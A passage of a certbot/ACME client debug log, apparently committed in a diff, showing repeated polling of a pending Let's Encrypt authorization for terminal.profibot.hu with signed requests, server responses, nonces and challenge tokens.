"Y6Cu1te16-LtZfWXSQI5eICQUlPNT4TsTqqFsBLS8_2NtbezOY3xPROv4yFFl6e4CxVOgvQVE1yb38zyJC_VBBmIu5W7NScK1fH1RZbiQbRwY0TwdDOi_HNyTMK8eTpZ61rcB4J4NQPbcxAyVNNtCRwf6kvgchiBCAb_1JX7-rOon-qHpue9i4mtYUcw8ZV5h_oTFey3wxh5Z1i09qkZJjJjgOgHD5VjxWUS84Oen_qkkKgBG0tklyrrFMDRQEAPqS_VnPVdYY0P0CE5K7LNKogPNoi0UFCibNm7e6PjXsWSGMfWL5QbduE1xjXMXIAhqjltCJcc8V025vtZPVJ0Fg", + "payload": "" +} +2026-01-27 23:19:25,154:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/649788427386 HTTP/1.1" 200 828 +2026-01-27 23:19:25,155:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Tue, 27 Jan 2026 23:19:25 GMT +Content-Type: application/json +Content-Length: 828 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: F4vGLPjlHTVaDXmOBf2DBjdfEL6PFeBv5rvMPB7llAWMIDkGNWs +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "terminal.profibot.hu" + }, + "status": "pending", + "expires": "2026-02-03T23:19:23Z", + "challenges": [ + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/iD1r9Q", + "status": "pending", + "token": "KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/PanWfQ", + "status": "pending", + "token": "KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/3Lj5Rg", + "status": "pending", + "token": "KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w" + } + ] +} +2026-01-27 23:19:25,155:DEBUG:acme.client:Storing nonce: F4vGLPjlHTVaDXmOBf2DBjdfEL6PFeBv5rvMPB7llAWMIDkGNWs +2026-01-27 23:19:25,156:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/PanWfQ', 'status': 'pending', 'token': 'KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w'} +2026-01-27 23:19:28,157:DEBUG:acme.client:JWS payload: +b'' +2026-01-27 23:19:28,161:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/649788427386: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJGNHZHTFBqbEhUVmFEWG1PQmYyREJqZGZFTDZQRmVCdjVydk1QQjdsbEFXTUlEa0dOV3MiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjQ5Nzg4NDI3Mzg2In0", + "signature": "ZN-Fc8DwNuei1wokZyLsn8u6UZbddFdlF0pXwfvP0Zyr3J_cLASNrNXkwvWbqI4J2q5Tl1qOEwDwC_Dvo01etXSQfZP7cQWu6eH9ypUREY1JeZsUKT8hPmFYOo1L5ZfcoKr3saIqFNngK8tSctrXHiZsKAmB90ntUME72ZZFsy-br0AncGFuJjMhaW7Hy9L2V7kwTAurnhGpb0WlUtMaiL-UA2e3XK6DGABvAXhO5TvRYQDnQO28itQUJofQhQ1tzPVR8zPFbe71CqnFkVNfovTlGQ7Vcu6K5PaaUFIkv8VRkbZtkBq42yfdTJWOAh7WeaBwd6d5sGp13mBMNnJUew", + "payload": "" +} +2026-01-27 23:19:28,317:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/649788427386 HTTP/1.1" 200 828 +2026-01-27 23:19:28,318:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Tue, 27 Jan 2026 23:19:28 GMT +Content-Type: application/json +Content-Length: 828 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: F4vGLPjlSDEIoYPXPdEXQC124X03w04SqyWlTio_ITy0EXnDGMM +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "terminal.profibot.hu" + }, + "status": "pending", + "expires": "2026-02-03T23:19:23Z", + "challenges": [ + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/3Lj5Rg", + "status": "pending", + "token": "KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/PanWfQ", + "status": "pending", + "token": "KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/iD1r9Q", + "status": "pending", + "token": "KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w" + } + ] +} +2026-01-27 23:19:28,318:DEBUG:acme.client:Storing nonce: F4vGLPjlSDEIoYPXPdEXQC124X03w04SqyWlTio_ITy0EXnDGMM +2026-01-27 23:19:28,319:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/PanWfQ', 'status': 'pending', 'token': 'KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w'} +2026-01-27 23:19:31,320:DEBUG:acme.client:JWS payload: +b'' +2026-01-27 23:19:31,324:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/649788427386: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJGNHZHTFBqbFNERUlvWVBYUGRFWFFDMTI0WDAzdzA0U3F5V2xUaW9fSVR5MEVYbkRHTU0iLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjQ5Nzg4NDI3Mzg2In0", + "signature": "G2a4ywCfpokQIgwCdF07rOsmGWyWeCTm61FmnzTUVC68Vze-9X2PTt00M7Ym1Jld9xSlfIE8GWIzARfkx-SeeCSWrn-JowMUM7TnWs3valZzAyG9DK6IBGty2q42dAdbKmsrE0WrLGb9z6f1sKY7QwvGAOhO2wApNTEv4ZhGjCfVp__3nYgAJ5Uc0Hez8rbBNTRLAneuE51_E1WerUSkUtAuZRthsfkKE-CGw_GZTWfOnv4eoJRPPTmBm7xVX6ccTnUBBufbiBtHA0X2aaSaEiVTgGl78YMPNF0xlMSQSJzjp55GsWeCJ34x4cWTXehEQdGVp-VWhIJkek8vRP0Xzg", + "payload": "" +} +2026-01-27 23:19:31,469:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/649788427386 HTTP/1.1" 200 828 +2026-01-27 23:19:31,470:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Tue, 27 Jan 2026 23:19:31 GMT +Content-Type: application/json +Content-Length: 828 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: F4vGLPjlInseeTd93_w0JFUnGn2W27XwCn-yK4dPo8YBTPh1uik +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "terminal.profibot.hu" + }, + "status": "pending", + "expires": "2026-02-03T23:19:23Z", + "challenges": [ + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/PanWfQ", + "status": "pending", + "token": "KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/iD1r9Q", + "status": "pending", + "token": "KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/3Lj5Rg", + "status": "pending", + "token": "KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w" + } + ] +} +2026-01-27 23:19:31,471:DEBUG:acme.client:Storing nonce: F4vGLPjlInseeTd93_w0JFUnGn2W27XwCn-yK4dPo8YBTPh1uik +2026-01-27 23:19:31,471:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/PanWfQ', 'status': 'pending', 'token': 'KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w'} +2026-01-27 23:19:34,472:DEBUG:acme.client:JWS payload: +b'' +2026-01-27 23:19:34,476:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/649788427386: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJGNHZHTFBqbEluc2VlVGQ5M193MEpGVW5HbjJXMjdYd0NuLXlLNGRQbzhZQlRQaDF1aWsiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjQ5Nzg4NDI3Mzg2In0", + "signature": "jYp0f78KdGi2_ScJVbfaM00FUJlxbTO2KYdMqJ7xN1xUtrxJj8G7KQmm0ihFkvoZwhGkbt_I5YxvF_QjlC-MoG41QxiP_vCTiTU_OKwdsvNQKmfafyWxGcJSl7COXOnhb8HOQcF-lZwJW68R7arMxx320Z7iKBWUwncaRtFahs2oJonRQ1b5pi4x-qEVbilbl0Zefj2uk3S4Le37hzZI0fYyT-a8-30uv9fiur4grfklZdvDRm8-MKAesIrUoFtiy8aFUsqCUFFTYuKefeI769QNpBs8ek2b6GNrEN6qx4EW9FeMnU4rdwT96s8jRwMFBhhBwrA9Wd9Mz5zyxrd-Iw", + "payload": "" +} +2026-01-27 23:19:34,622:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/649788427386 HTTP/1.1" 200 828 +2026-01-27 23:19:34,623:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Tue, 27 Jan 2026 23:19:34 GMT +Content-Type: application/json +Content-Length: 828 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: F4vGLPjlp5yFuQElT9VqaILSFyQJuzxaOnDEiMNcVbFIsMXp07E +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "terminal.profibot.hu" + }, + "status": "pending", + "expires": "2026-02-03T23:19:23Z", + "challenges": [ + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/PanWfQ", + "status": "pending", + "token": "KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/iD1r9Q", + "status": "pending", + "token": "KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/3Lj5Rg", + "status": "pending", + "token": "KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w" + } + ] +} +2026-01-27 23:19:34,623:DEBUG:acme.client:Storing nonce: F4vGLPjlp5yFuQElT9VqaILSFyQJuzxaOnDEiMNcVbFIsMXp07E +2026-01-27 23:19:34,624:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/PanWfQ', 'status': 'pending', 'token': 'KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w'} +2026-01-27 23:19:37,625:DEBUG:acme.client:JWS payload: +b'' +2026-01-27 23:19:37,628:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/649788427386: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJGNHZHTFBqbHA1eUZ1UUVsVDlWcWFJTFNGeVFKdXp4YU9uREVpTU5jVmJGSXNNWHAwN0UiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjQ5Nzg4NDI3Mzg2In0", + "signature": "eb-3JkbnaOOCePDxfKDPHoqYk1au2fiytBJEisur24ntyrfgoluy92noZZMP5ZBv5favzBRwf_e-SHEDsw7mOrOGQxLkRwbn0TxuVG8e6YevMvfInfYhyIfoNqi6tlrBuPLFGaA5co5ay4sh_Evb61hrjKnuebXyurKL_-oa3Zz0tOcYhf5zxsr0VcNPbgRyXRTcd7Kf_29x0GNfiheEbMlVMV_70hpjYZASiEobx8wQr503Rx9V2mkTVaymumugMl0C0lGKIgy7oFrh8R4h_24Xg1S5ZNjBq95L4KYmp9vwiIeNPIb5OFXb9n1PYC0iueIzorNc0au7MCwhrobcQA", + "payload": "" +} +2026-01-27 23:19:37,774:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/649788427386 HTTP/1.1" 200 828 +2026-01-27 23:19:37,775:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Tue, 27 Jan 2026 23:19:37 GMT +Content-Type: application/json +Content-Length: 828 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: F4vGLPjlCKKC1uZJYx0pLpYEt8bIH32exo7ErAflUFz2mcAYo4s +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "terminal.profibot.hu" + }, + "status": "pending", + "expires": "2026-02-03T23:19:23Z", + "challenges": [ + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/PanWfQ", + "status": "pending", + "token": "KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/3Lj5Rg", + "status": "pending", + "token": "KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/iD1r9Q", + "status": "pending", + "token": "KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w" + } + ] +} +2026-01-27 23:19:37,776:DEBUG:acme.client:Storing nonce: F4vGLPjlCKKC1uZJYx0pLpYEt8bIH32exo7ErAflUFz2mcAYo4s +2026-01-27 23:19:37,776:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/PanWfQ', 'status': 'pending', 'token': 'KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w'} +2026-01-27 23:19:40,777:DEBUG:acme.client:JWS payload: +b'' +2026-01-27 23:19:40,781:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/649788427386: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJGNHZHTFBqbENLS0MxdVpKWXgwcExwWUV0OGJJSDMyZXhvN0VyQWZsVUZ6Mm1jQVlvNHMiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjQ5Nzg4NDI3Mzg2In0", + "signature": "PEXiNRKhSHad22j35ykCzwNoL1q9rlEg9HiOZfrDh2PaKIw-WQtCmfAG-kRmvL86WfU1KymWePfSpotuMCdjzy4HUMQzvGlXYNhRt04luuUiY6WqvgcqsG1Weykcw6ak97BpgF4EK9pLAKRebisDXSHP9SHG_40yHa6VoHJHSKJ9rGE21tO_ZczvHwm-WXbG1QeQ9_diAoM8-lO4wpL8MkxT3cdO8CopHHoVPFzH08XcDQNZyDuI9f-FvhC0C3uHhpKSIPsZe87f2iOzSWA8KhghbK8wFDuM0ZrMjJ2k-3wXG7ffbGXwLKcIaNME19FyjSQUpsxIUEUnf3AmpwyXmg", + "payload": "" +} +2026-01-27 23:19:40,925:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/649788427386 HTTP/1.1" 200 828 +2026-01-27 23:19:40,926:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Tue, 27 Jan 2026 23:19:40 GMT +Content-Type: application/json +Content-Length: 828 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: z6o3uXKgsUfFvCntvRT0dKUHmwf-o6i6Ug0mjSogjRo-uL_BIWk +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "terminal.profibot.hu" + }, + "status": "pending", + "expires": "2026-02-03T23:19:23Z", + "challenges": [ + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/3Lj5Rg", + "status": "pending", + "token": "KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/PanWfQ", + "status": "pending", + "token": "KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/iD1r9Q", + "status": "pending", + "token": "KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w" + } + ] +} +2026-01-27 23:19:40,926:DEBUG:acme.client:Storing nonce: z6o3uXKgsUfFvCntvRT0dKUHmwf-o6i6Ug0mjSogjRo-uL_BIWk +2026-01-27 23:19:40,926:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/PanWfQ', 'status': 'pending', 'token': 'KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w'} +2026-01-27 23:19:43,927:DEBUG:acme.client:JWS payload: +b'' +2026-01-27 23:19:43,931:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/649788427386: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJ6Nm8zdVhLZ3NVZkZ2Q250dlJUMGRLVUhtd2YtbzZpNlVnMG1qU29nalJvLXVMX0JJV2siLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjQ5Nzg4NDI3Mzg2In0", + "signature": "A6WyrmQH7mHQOyvRpxvlGmqzZB1hdfOBzXvZ4_EzWkpX7LNZSzEMPWaKEfGuYfwXYp9dVNl6sJXzneuodQjmJ_QcMTbINFLp0v_GCkSklI0dycN3MMtSd9eqf7xq1BdUKi8HHYK8JMUCAG3eC_ZNCP2YYFIxIpKlWFfqi6491cpJwYmCSE1Fi_2_ZXPPVMiE558OR-hEQ9wlbDoosgw3w9ErqwQQw8B-OQoXeMFBCuOpiM8Zq5U5dxCb16FHh1zqH_PNmem99yNt9em2fFDyoPXGqhywO_1YrjfzD9_ucgL7-WW-Tr7N2YO4CFDGjl3MWGPYQf5sDsHNIG1CQ1j-Aw", + "payload": "" +} +2026-01-27 23:19:44,076:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/649788427386 HTTP/1.1" 200 828 +2026-01-27 23:19:44,077:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Tue, 27 Jan 2026 23:19:44 GMT +Content-Type: application/json +Content-Length: 828 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: F4vGLPjlisqJkINek1IXv6rKN_5cDe94Krn1-wi1q510m7AKGmo +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "terminal.profibot.hu" + }, + "status": "pending", + "expires": "2026-02-03T23:19:23Z", + "challenges": [ + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/PanWfQ", + "status": "pending", + "token": "KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w" + }, + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/3Lj5Rg", + "status": "pending", + "token": "KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/iD1r9Q", + "status": "pending", + "token": "KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w" + } + ] +} +2026-01-27 23:19:44,078:DEBUG:acme.client:Storing nonce: F4vGLPjlisqJkINek1IXv6rKN_5cDe94Krn1-wi1q510m7AKGmo +2026-01-27 23:19:44,078:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/PanWfQ', 'status': 'pending', 'token': 'KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w'} +2026-01-27 23:19:47,079:DEBUG:acme.client:JWS payload: +b'' +2026-01-27 23:19:47,082:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/649788427386: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJGNHZHTFBqbGlzcUprSU5lazFJWHY2cktOXzVjRGU5NEtybjEtd2kxcTUxMG03QUtHbW8iLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjQ5Nzg4NDI3Mzg2In0", + "signature": "j_85qTEi2lm2l19jK6YFqcv_mW8h0OGVe5bgYzrABxRvxhSSCKr-WY4LuXQN-tCal0Q1-X5hXUQjdgZcXGTYzMCJgw6hqbzR3OU751c-mt4j9uhjYNbecfwJ1D5LP_lvqajrnAu9v8sdA7iK-9C_s2hxYtsMyP2Vz2oPKrR1pPzzMKVcApcMGbID5ZyQ893-6bmzSM1cMiakoFCWNClQE-15Etqzpk0suN0xI4PyKZbN1BCYvi5FHSKATMgmchUO5Dq5EtFY4kvGHU3Ql5SCZIkL09e-NotCBc1xTXTdm6NmsSuBmM9rQQ6U5Aa5DVKWdNUVzCgRLiBN1q9eqwab1g", + "payload": "" +} +2026-01-27 23:19:47,239:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/649788427386 HTTP/1.1" 200 828 +2026-01-27 23:19:47,239:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Tue, 27 Jan 2026 23:19:47 GMT +Content-Type: application/json +Content-Length: 828 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: F4vGLPjl_jXd04SrwuHmoz82Zz-exyMgM4YkDqGRFkMIdMLkuQ0 +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "terminal.profibot.hu" + }, + "status": "pending", + "expires": "2026-02-03T23:19:23Z", + "challenges": [ + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/3Lj5Rg", + "status": "pending", + "token": "KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w" + }, + { + "type": "tls-alpn-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/PanWfQ", + "status": "pending", + "token": "KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w" + }, + { + "type": "dns-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/iD1r9Q", + "status": "pending", + "token": "KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w" + } + ] +} +2026-01-27 23:19:47,240:DEBUG:acme.client:Storing nonce: F4vGLPjl_jXd04SrwuHmoz82Zz-exyMgM4YkDqGRFkMIdMLkuQ0 +2026-01-27 23:19:47,240:DEBUG:acme.challenges:tls-alpn-01 was not recognized, full message: {'type': 'tls-alpn-01', 'url': 'https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/PanWfQ', 'status': 'pending', 'token': 'KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w'} +2026-01-27 23:19:50,242:DEBUG:acme.client:JWS payload: +b'' +2026-01-27 23:19:50,245:DEBUG:acme.client:Sending POST request to https://acme-v02.api.letsencrypt.org/acme/authz/2906438176/649788427386: +{ + "protected": "eyJhbGciOiAiUlMyNTYiLCAia2lkIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2FjY3QvMjkwNjQzODE3NiIsICJub25jZSI6ICJGNHZHTFBqbF9qWGQwNFNyd3VIbW96ODJaei1leHlNZ000WWtEcUdSRmtNSWRNTGt1UTAiLCAidXJsIjogImh0dHBzOi8vYWNtZS12MDIuYXBpLmxldHNlbmNyeXB0Lm9yZy9hY21lL2F1dGh6LzI5MDY0MzgxNzYvNjQ5Nzg4NDI3Mzg2In0", + "signature": "Q_ov6bjIeLWI14twjpBufnFhgjA-YatWwHuWf5wH2qsoQ24g1id6I-9WMUkGeJs8lhjF6ycbF8KR1uGpNwZJaQtxM8B4H5mISOas-DSYe864gI-YyQF-ArmUJjiLFPYGi3YMLp3v_UZcTxccwn_4bZos1UkBOUJV_-BhxeSIkuwFTZch-M61lhv7kKL11lR3oNqOTdgwwpnGgH7x7zrqYWRQQ1Ltzcw6958mElDM69LB6oEus1csm5Wyx9hpQurz1p-bQ63ceQbYyvs1e_SgYr-8D3AOy4xFtRQ1X7mhdqyKh-vxU6EaGBEYX4qP-sIHhwuGIo0IfMySzEBwVETiFg", + "payload": "" +} +2026-01-27 23:19:50,391:DEBUG:urllib3.connectionpool:https://acme-v02.api.letsencrypt.org:443 "POST /acme/authz/2906438176/649788427386 HTTP/1.1" 200 828 +2026-01-27 23:19:50,392:DEBUG:acme.client:Received response: +HTTP 200 +Server: nginx +Date: Tue, 27 Jan 2026 23:19:50 GMT +Content-Type: application/json +Content-Length: 828 +Connection: keep-alive +Boulder-Requester: 2906438176 +Cache-Control: public, max-age=0, no-cache +Link: ;rel="index" +Replay-Nonce: z6o3uXKg-a7OpxHOXb3wPef95UJ2hhZTZ2HDCbQjVvdRWbBe2Fs +X-Frame-Options: DENY +Strict-Transport-Security: max-age=604800 + +{ + "identifier": { + "type": "dns", + "value": "terminal.profibot.hu" + }, + "status": "pending", + "expires": "2026-02-03T23:19:23Z", + "challenges": [ + { + "type": "http-01", + "url": "https://acme-v02.api.letsencrypt.org/acme/chall/2906438176/649788427386/3Lj5Rg", + "status": "pending", + "token": "KtolfhWy2aolVMc69aYbXPzY2EU6gtQx8-uvkiejZ5w" + }, + { + "type": "tls-alpn-01", + "url": 